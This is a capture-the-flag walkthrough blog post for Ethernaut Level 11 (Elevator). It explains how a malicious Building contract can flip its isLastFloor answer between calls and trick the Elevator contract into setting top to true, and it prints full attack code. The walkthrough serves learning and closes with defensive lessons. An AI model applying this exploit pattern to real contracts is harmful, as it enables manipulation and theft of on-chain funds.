Skip links

Table of Contents

Ethernaut Level 11 Walkthrough: Elevator

Ethernaut challenges, comparable to a Web3-themed hacking Capture The Flag (CTF) competition, offer a dynamic environment for diving into Ethereum and Solidity programming. Each level introduces a distinct smart contract puzzle, designed to test your abilities in pinpointing and exploiting flaws.

As a full-stack software engineer diving into blockchain technology, these challenges act as valuable learning experiences to grasp the intricacies of smart contract vulnerabilities. Every level deepens our understanding of blockchain security, thus improving our skills in building decentralized applications. In this blog post, we’ll explore Ethernaut Level 11, where we decode the complexities of Solidity smart contracts and learn how to circumvent security measures.

In this Ethernaut challenge we get the following simple contract:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

interface Building {
    function isLastFloor(uint256) external returns (bool);
}

contract Elevator {
    bool public top;
    uint256 public floor;

    function goTo(uint256 _floor) public {
        Building building = Building(msg.sender);

        if (!building.isLastFloor(_floor)) {
            floor = _floor;
            top = building.isLastFloor(floor);
        }
    }
}

The Building interface defines a function isLastFloor that returns whether a given floor is the last one. The Elevator contract’s goTo function calls isLastFloor on an external Building contract to check if a floor is the last floor. If the floor is not the last, it updates the elevator’s current floor and checks again to update its top floor status.

We get the following help, to beat this level:

“This elevator won’t let you reach the top of your building. Right?

Things that might help:

  • Sometimes solidity is not good at keeping promises.
  • This Elevator expects to be used from a Building.”

The goTo function in the Elevator contract relies on the external Building contract’s isLastFloor function to determine whether the specified floor is the top floor. If the Building contract is implemented in a way that always returns false for isLastFloor, the Elevator contract will never recognize any floor as the top floor (top will never be set to true), effectively preventing the elevator from reaching what it believes to be the top of the building.

How to Exploit

By alternating the return value of isLastFloor, another contract can trick the Elevator contract into believing it has reached the top floor when it sets the floor to the desired value. This can bypass the intended logic of the Elevator contract, which relies on an honest isLastFloor implementation to function correctly.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import './Elevator.sol';

contract ElevatorAttack {
    bool public pwn = true;
    Elevator public target;

    constructor (address _targetAddress)  {
        target = Elevator(_targetAddress);
    }

    function isLastFloor(uint)public returns (bool){
        pwn = !pwn;
        return pwn;
    }
    function setTop(uint _floor) public {
        target.goTo(_floor);
    }
}
  • When setTop is called, it invokes the goTo function of the Elevator contract with _floor as an argument.
  • The Elevator contract then calls isLastFloor(_floor) on the msg.sender, which is the ElevatorAttack contract.
  • On the first call to isLastFloorpwn flips to false and returns false, making the Elevator contract set its floor to _floor.
  • The Elevator contract then calls isLastFloor again to update top.
  • On the second call, pwn flips to true and returns true, making the Elevator contract set top to true.

Conclusion

Interfaces do not guarantee contract security: Just because another contract uses the same interface doesn’t mean it will behave as expected.

Be cautious with contract inheritance: Inheriting contracts that extend from interfaces can introduce security risks due to information obscurity, making each layer potentially less secure.

Check your compiler version: Be aware of the compiler version you’re using or inheriting from; view and pure functions might be compromised without your knowledge.

Additional reading:

https://ethereum.org/en/developers/docs/smart-contracts/composability

https://docs.soliditylang.org/en/develop/contracts.html#view-functions

faq

FAQs

How do I start solving Ethernaut challenges?

  • Visit Ethernaut and connect your Ethereum wallet.

How do I use Remix IDE for Ethernaut challenges?

  • Open Remix IDE, create a new file, paste the contract code, compile, deploy, and interact with it using MetaMask.

Where can I find Ethereum and Solidity documentation?

How do I deploy contracts on a test network?

  • Compile and deploy Elevator.sol and ElevatorAttack.sol using Remix IDE and MetaMask.

What are essential Solidity concepts for this challenge?

  • Interfaces, external calls, state variables, function modifiers.

Metana Guarantees a Job 💼

Plus Risk Free 2-Week Refund Policy ✨

You’re guaranteed a new job in web3—or you’ll get a full tuition refund. We also offer a hassle-free two-week refund policy. If you’re not satisfied with your purchase for any reason, you can request a refund, no questions asked.

Web3 Solidity Bootcamp

The most advanced Solidity curriculum on the internet!

Full Stack Web3 Beginner Bootcamp

Learn foundational principles while gaining hands-on experience with Ethereum, DeFi, and Solidity.

You may also like

Metana Guarantees a Job 💼

Plus Risk Free 2-Week Refund Policy

You’re guaranteed a new job in web3—or you’ll get a full tuition refund. We also offer a hassle-free two-week refund policy. If you’re not satisfied with your purchase for any reason, you can request a refund, no questions asked.

Web3 Solidity Bootcamp

The most advanced Solidity curriculum on the internet

Full Stack Web3 Beginner Bootcamp

Learn foundational principles while gaining hands-on experience with Ethereum, DeFi, and Solidity.

Learn foundational principles while gaining hands-on experience with Ethereum, DeFi, and Solidity.

Events by Metana

Dive into the exciting world of Web3 with us as we explore cutting-edge technical topics, provide valuable insights into the job market landscape, and offer guidance on securing lucrative positions in Web3.

Subscribe to Lettercamp

We help you land your dream job! Subscribe to find out how

Start Your Application

Secure your spot now. Spots are limited, and we accept qualified applicants on a first come, first served basis..

Career Track(Required)

The application is free and takes just 3 minutes to complete.

What is included in the course?

Expert-curated curriculum

Weekly 1:1 video calls with your mentor

Weekly group mentoring calls

On-demand mentor support

Portfolio reviews by Design hiring managers

Resume & LinkedIn profile reviews

Active online student community

1:1 and group career coaching calls

Access to our employer network

Job Guarantee

Get a detailed look at our Full Stack Bootcamp

Understand the goal of the bootcamp

Find out more about the course

Explore our methodology & what technologies we teach

You are downloading 2024 updated Full stack Bootcamp syllabus!

Download the syllabus to discover our Full-Stack Software Engineering Bootcamp curriculum, including key modules, project-based learning details, skill outcomes, and career support. Get a clear path to becoming a top developer.

"*" indicates required fields

This field is for validation purposes and should be left unchanged.